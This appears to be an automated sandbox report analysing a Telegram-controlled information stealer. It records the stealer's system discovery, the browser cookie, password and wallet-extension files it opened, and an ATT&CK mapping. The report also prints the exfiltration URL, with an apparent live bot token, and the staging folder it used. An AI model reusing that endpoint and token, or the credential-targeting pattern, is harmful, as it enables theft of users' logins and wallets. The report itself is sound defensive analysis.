Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041DCF0 _wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,GetSystemTimeAsFileTime,GetCurrentProcessId,GetTempPathW,GetCommandLineW,CommandLineToArgvW,abort,abort,

0_2_0041DCF0

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 1.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.209057269.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.210593944.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.211333071.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.207348284.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.219304449.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.219282036.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 1.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.test.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.209057269.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.210593944.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.211333071.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.207348284.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.219304449.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.219282036.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 1_2_00007FFD3FBE2B5D bind,WSAGetLastError,		1_2_00007FFD3FBE2B5D
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE2B5D bind,WSAGetLastError,		2_2_00007FFD3FBE2B5D

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_elementtree.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_msi.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_tkinter.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_uuid.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_zoneinfo.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\comctl32.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\python39.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tcl86t.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tk86t.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\vcruntime140.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	URL Reputation	safe
http://www.nightmare.com/squirl/python-ext/misc/syslog.py	0%	URL Reputation	safe
https://mahler:8092/site-updates.py	0%	Avira URL Cloud	safe
http://speleotrove.com/decimal/decarith.html	0%	URL Reputation	safe
http://logo.verisign.coz	0%	Avira URL Cloud	safe
http://logo.veris	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.59.81	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument	false		high
https://ipinfo.io/json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mahler:8092/site-updates.py	test.exe, 00000001.00000002.230840850.00000000056D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://logo.veris	test.exe, 00000001.00000003.228550797.00000000066E1000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231400935.00000000066E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.230404332.00000000047C0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/	test.exe, 00000001.00000002.230840850.00000000056D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v6/users/	test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.python.org/dev/peps/pep-0205/	test.exe, 00000001.00000002.231278195.0000000006440000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.231129087.00000000062A0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://python.org/dev/peps/pep-0263/	test.exe, 00000001.00000002.231915752.00007FFD40522000.00000002.00000001.01000000.00000005.sdmp	false		high
https://www.google.com/search?q=.net	test.exe, 00000001.00000003.224812362.0000000006725000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.nightmare.com/squirl/python-ext/misc/syslog.py	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/psf/license/	test.exe, 00000001.00000002.230288294.0000000001750000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/character-sets	test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm	file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	false		high
